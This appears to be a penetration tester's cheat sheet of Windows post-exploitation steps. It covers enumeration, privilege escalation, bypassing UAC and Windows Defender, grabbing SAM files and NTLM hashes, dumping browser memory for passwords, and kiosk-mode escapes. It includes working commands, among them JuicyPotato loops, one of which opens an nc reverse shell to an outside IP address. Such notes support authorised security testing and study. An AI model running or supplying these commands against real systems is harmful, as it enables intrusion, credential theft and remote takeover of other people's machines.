1. Per­form basic Win­dows sys­tem enumeration
2. Enu­mer­ate the file system(s)
3. Per­form priv­i­lege esca­la­tion scripts
4. Check the Win­dows Ser­vice Exploita­tion post
5. Per­form Metas­ploit Pos­tex modules
6. Per­form Empire pos­tex modules 
   • Exe­cute PowerUp
7. Try oth­er stuff
8. Per­form the steps again.

After these steps, more things to do:

• Metas­ploit:
  • msf> use multi/recon/local_exploit_suggester
  • msf> post/windows/*
• Check out the Win­dows Sub­sys­tem for Linux

Work with processes

For enu­mer­a­tion of process­es, see the Basic Win­dows sys­tem enu­mer­a­tion post.

Kill a process

taskkill /PID $pid
taskkill /IM notepad.exe

pskill /accepteula $pid // With SysinternalTools

Sus­pend and con­tin­ue a run­ning process with SysinternalTools:

pssuspend /accepteula notepad.exe
...
pssuspend /accepteula -r notepad.exe

Work with DLL’s

Show all loaded unsigned DLL’s on the sys­tems. This can help to detect mali­cious code.

listdlls /accepteula -a // With SysinternalTools

Various topics

• Bypass­ing Win­dows pro­tec­tion mechanisms.
  1. Exe­cu­tion
  2. Fire­wall
  3. UAC
  4. Win­dows Defender
• Add a RDP account and log in via the GUI.
• Mon­i­tor the live system
• If the AlwaysIn­stal­lEl­e­vat­ed val­ues are 1 from this query:
  reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  then see here.
• Check the list of ker­nel exploits for the cur­rent system.
• Run respon­der to see traffic
• Get SAM files
• Browse trough logs in PS. E.g. see Logs from a user. More Info here.
  Get-EventeLog -UserName ryan
• Exe­cute a com­mand as anoth­er user:
  runas /user:userName cmd.exe
• If you don’t have access to a file you want to: 
  • Check per­mis­sions on the file with icacls.
  • Check per­mis­sions with icacls also at the directory.
  • Check var­i­ous dir com­mands to see spe­cial per­mis­sions, alter­nate streams.
  • Try to change own­er­ship:
    icacls root.txt /grant alfred:F
• If you can exe­cute a GUI pro­gram with elea­vat­ed priv­i­leges, open the open dia­log, add into the path file://c:/windows/system32/cmd.exe and “open”.
• If you have access to a sys­tem, but no NTLM hash­es, try to con­nect to an own serv­er with Respon­der to get a NTLM hash.

External ressources

• Fuzzy­Se­cu­ri­ty
• Pay­load­All­TheThings
• Check­list from hacktricks
• Check­list of areas

Various things to use and remember

• Need details about a com­mand?
  help $command
• Build-in com­mands (type help for the com­plete list): 
  • Show file attrib­ut­es
    attrib $file
  • Show (and change!) ACLs of a file:
    cacls $file
icacls $file // can also modify!
  • Diff / Com­pare two files:
    comp $f1 $f2
    or
    fc $f1 $f2
  • The com­mand fsu­til gives infor­ma­tion about the file sys­tems. Use­ful sub­com­mands:
    fsutil fsInfo drives // Returns all avail­able dri­ves
    fsutil quota ... // Man­age quo­ta limits
  • Show / set exe­cute­able search paths:
    path
  • Show / set envi­ron­ment vari­ables:
    set
• Grep­ping through large out­put with find­str (Man­page):
  • Find a string case-insen­si­tive:
    dir /s /a | findstr /i /C:password
  • Find all lines which does­n’t include a string:
    dir /s /a | findstr /i /v /C:TEMP
  • Find all lines which start with a string:
    dir /s /a | findstr /i /b /C:bla
  • Find all lines which end with a string:
    dir /s /a | findstr /i /e /C:.docx
• How to down­load files with notepad:
  

Ideas of dispear

• Some process­es can hold sen­si­tive data in their mem­o­ry. Check if an inter­est­ing process is run­ning (Brows­er!). Use procdump.exe to dump the mem­o­ry and ana­lyze it local­ly. (E.g with strings <dump> or a hex edi­tor or grep for pass­word string or known user string.)
  procdump64.exe -ma -accepteula
• Exe­cute driverquery /v and search for ker­nel dri­ver exploits.
• Check alter­nate data streams
• Try the JuicyPotatoe
  • Priv­i­lege SeImpersonate or SeAssignPrimaryToken needed.
  • Exam­ple: JuicyPotato.exe ‑t * ‑p “C:\Temp\p64_443.exe” ‑l 5542
  • If error COM -> recv failed with error: 10038 occurs, check oth­er CLSID. (See also the juicy_potato_clsid_runner.bat script.)
  • Read cre­den­tials for users DPAPI etc.: https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde/view/Discussions#content
  • Alter­na­tive: Try chur­ras­co
  • Or see MS10-059 exploit in the win­dows-ker­nel-exploits direc­to­ry. (Open nc han­dler local­ly, exe­cute MS10-059.exe on the vic­tim with your own IP and port.)
  • Try all CLSIDS in the com­mand line:
    for /F "tokens=*" %A in (clsids2.txt) do Juicy.Potato.x86.exe -t * -p C:\Temp\s32.exe -l 5542 -c %A
for /F "tokens=*" %A in (clsids2.txt) do Juicy.Potato.x86.exe -t * -p C:\windows\system32\cmd.exe -a "/c C:\wamp\www\nc.exe -e cmd.exe 192.168.49.179 80" -l 5542 -c %A
• Some appli­ca­tions does­n’t work any­more, but old one may do. Try an old attack­ing machine or ver­sion of some pre­vi­ous­ly tried software.

Kiosk mode escape

• You can down­load in open dialogs.
• Try to open oth­er process­es with­in the allowed application.
• Try to open an explorer.
• Type “explor­er” in a explor­er to start a Win­dows set up script.
• Upload base64 encod­ed file via HTTP in Notepad open dia­log and decode it with certutil.
• Exe­cute via dll or rundll32 or as screensaver.